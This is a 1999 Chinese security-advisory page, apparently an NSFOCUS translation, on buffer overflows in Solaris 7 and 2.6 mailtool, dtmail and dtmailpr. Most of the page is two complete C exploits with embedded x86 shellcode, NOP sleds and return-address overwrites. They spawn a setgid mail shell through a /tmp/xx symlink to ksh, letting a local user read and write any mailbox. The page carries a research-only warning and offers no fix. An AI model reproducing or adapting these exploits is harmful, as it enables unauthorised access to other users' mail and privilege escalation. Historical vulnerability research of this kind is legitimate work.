首页 -> 安全研究

安全研究

安全漏洞
Solaris7邮件系统漏洞

发布日期:1999-11-29
更新日期:1999-11-29

受影响系统:
Solaris2.6 (Intel,Sparc)
Solaris7 (Intel,Sparc)
描述:
Solaris7安装的邮件程序(mailtool和dtmail)和邮件消息打印过滤器(dtmailpr)被发现存   
在缓存溢出问题。因为上述这些程序是sgid(mail group)程序,通过溢出程序在本地可以读/写任意用户的邮件。   
  
1) mailtool   
  
通常使用在开放窗口环境。问题出在处理"Content-Type:"时:   
例如:   
Content-Type: image/aaaaaaaa long ''a'' aaaaaa; name="test.gif"   
如果选用了一个包括上述"Content-Type:"的e-mail,mailtool将会产生溢出。   
  
2) dtmail   
  
通常用于CDE。如果给"-f"选项指定一个长字符串,dtmail将会溢出。编这个溢出程序很简单,当指定长"a"字串时,可以确认EIP=0x41414141 。   
  
3) dtmailpr   
dtmailpr是邮件消息打印过滤程序。也是由于"-f"选项而造成的溢出。同样在使用长”a" 字串时,可以确认EIP=0x41414141 。   
  
I coded the exploits to get mail gid(egid=6). There are for Intel   
Solaris7. There are same kind of problems on Sparc Solaris7 and   
Solaris2.6 (Intel,Sparc)   


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

通过以下溢出程序,可以得到mail gid(egid=6).本程序只用于 Intel Solaris7。同样的问题也存在于 Sparc Solaris7 和Solaris2.6 (Intel,Sparc)。   
  
ex_mailtool.c   
-----   
/*=============================================================================   
Solaris mailtool exploit for Solaris7 Intel Edition   
The Shadow Penguin Security (http://shadowpenguin.backsection.net)   
Written by UNYUN (shadowpenguin@backsection.net)   
Descripton:   
Local user can read/write any user''s mailbox   
Usage:   
setenv DISPLAY yourdisply   
gcc ex_mailtool.c   
./a.out /var/mail/[any user]   
- Choice "exploit@localhost" mail   
=============================================================================   
*/   
  
#include   
  
#define FAKEADR 96   
#define FAKEOFS 0x1000   
#define RETADR 84   
#define RETOFS 0x1224   
#define EXPADR 300   
#define NOP 0x90   
#define MAXBUF 2000   
#define DIR "/usr/openwin/bin"   
  
#define HEAD \   
"From exploit@localhost Fri Nov 26 00:01 JST 1999\n"\   
"Content-Type: multipart/mixed; "\   
"boundary=\"VGh1LCAyNSBOb3YgMTk5OSAyMjozOTo1MSArMDkwMA==\"\n"\   
"Content-Length: 340\n\n"\   
"--VGh1LCAyNSBOb3YgMTk5OSAyMjozOTo1MSArMDkwMA==\n"\   
"Content-Type: image/%s; name=\"test.gif\"\n"\   
"Content-Disposition: attachment;\n"\   
" filename=\"test.gif\"\n"\   
"Content-Transfer-Encoding: base64\n\n"\   
"IA==\n\n"\   
"--VGh1LCAyNSBOb3YgMTk5OSAyMjozOTo1MSArMDkwMA==--\n\n"   
  
unsigned long get_sp(void)   
{   
__asm__(" movl %esp,%eax ");   
}   
  
char exploit_code[2000] =   
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"   
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"   
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"   
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"   
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"   
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"   
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"   
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"   
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"   
"\x04\xe8\xc9\xff\xff\xff/tmp/xx";   
  
main(int argc, char *argv[])   
{   
static char buf[MAXBUF];   
FILE *fp;   
unsigned int i,ip,sp;   
  
if (argc!=2){   
printf("usage : %s mailbox\n",argv[0]);   
exit(1);   
}   
putenv("LANG=");   
sp=get_sp();   
system("ln -s /bin/ksh /tmp/xx");   
printf("esp = 0x%x\n",sp);   
memset(buf,NOP,MAXBUF);   
buf[MAXBUF-1]=0;   
  
ip=sp-FAKEOFS;   
printf("fake = 0x%x\n",ip);   
buf[FAKEADR ]=ip&0xff;   
buf[FAKEADR+1]=(ip>>8)&0xff;   
buf[FAKEADR+2]=(ip>>16)&0xff;   
buf[FAKEADR+3]=(ip>>24)&0xff;   
ip=sp-RETOFS;   
printf("eip = 0x%x\n",ip);   
buf[RETADR ]=ip&0xff;   
buf[RETADR+1]=(ip>>8)&0xff;   
buf[RETADR+2]=(ip>>16)&0xff;   
buf[RETADR+3]=(ip>>24)&0xff;   
  
strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));   
  
if ((fp=fopen(argv[1],"ab"))==NULL){   
printf("Can not write ''%s''\n",argv[1]);   
exit(1);   
}   
fprintf(fp,HEAD,buf);   
fclose(fp);   
printf("Exploit mail has been added.\n");   
printf("Choice \"exploit@localhost\" mail.\n");   
sprintf(buf,"cd %s; mailtool",DIR);   
system(buf);   
}   
  
  
ex_mailtool.c   
-----   
/*=============================================================================   
Solaris dtmailpr exploit for Solaris7 Intel Edition   
The Shadow Penguin Security (http://shadowpenguin.backsection.net)   
Written by UNYUN (shadowpenguin@backsection.net)   
Descripton:   
Local user can read/write any user''s mailbox   
=============================================================================   
*/   
  
#include   
  
#define RETADR 1266   
#define RETOFS 0x1d88   
#define EXPADR 300   
#define NOP 0x90   
#define MAXBUF 2000   
  
unsigned long get_sp(void)   
{   
__asm__(" movl %esp,%eax ");   
}   
  
char exploit_code[2000] =   
"\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"   
"\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"   
"\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"   
"\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"   
"\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"   
"\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"   
"\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"   
"\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"   
"\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"   
"\x04\xe8\xc9\xff\xff\xff/tmp/xx";   
  
main()   
{   
static char buf[MAXBUF+1000];   
FILE *fp;   
unsigned int i,ip,sp;   
  
putenv("LANG=");   
sp=get_sp();   
system("ln -s /bin/ksh /tmp/xx");   
printf("esp = 0x%x\n",sp);   
memset(buf,NOP,MAXBUF);   
ip=sp-RETOFS;   
printf("eip = 0x%x\n",ip);   
buf[RETADR ]=ip&0xff;   
buf[RETADR+1]=(ip>>8)&0xff;   
buf[RETADR+2]=(ip>>16)&0xff;   
buf[RETADR+3]=(ip>>24)&0xff;   
strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));   
buf[MAXBUF-1]=0;   
execl("/usr/dt/bin/dtmailpr","dtmailpr","-f",buf,0);   
}

建议:
暂无

浏览次数:7776
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障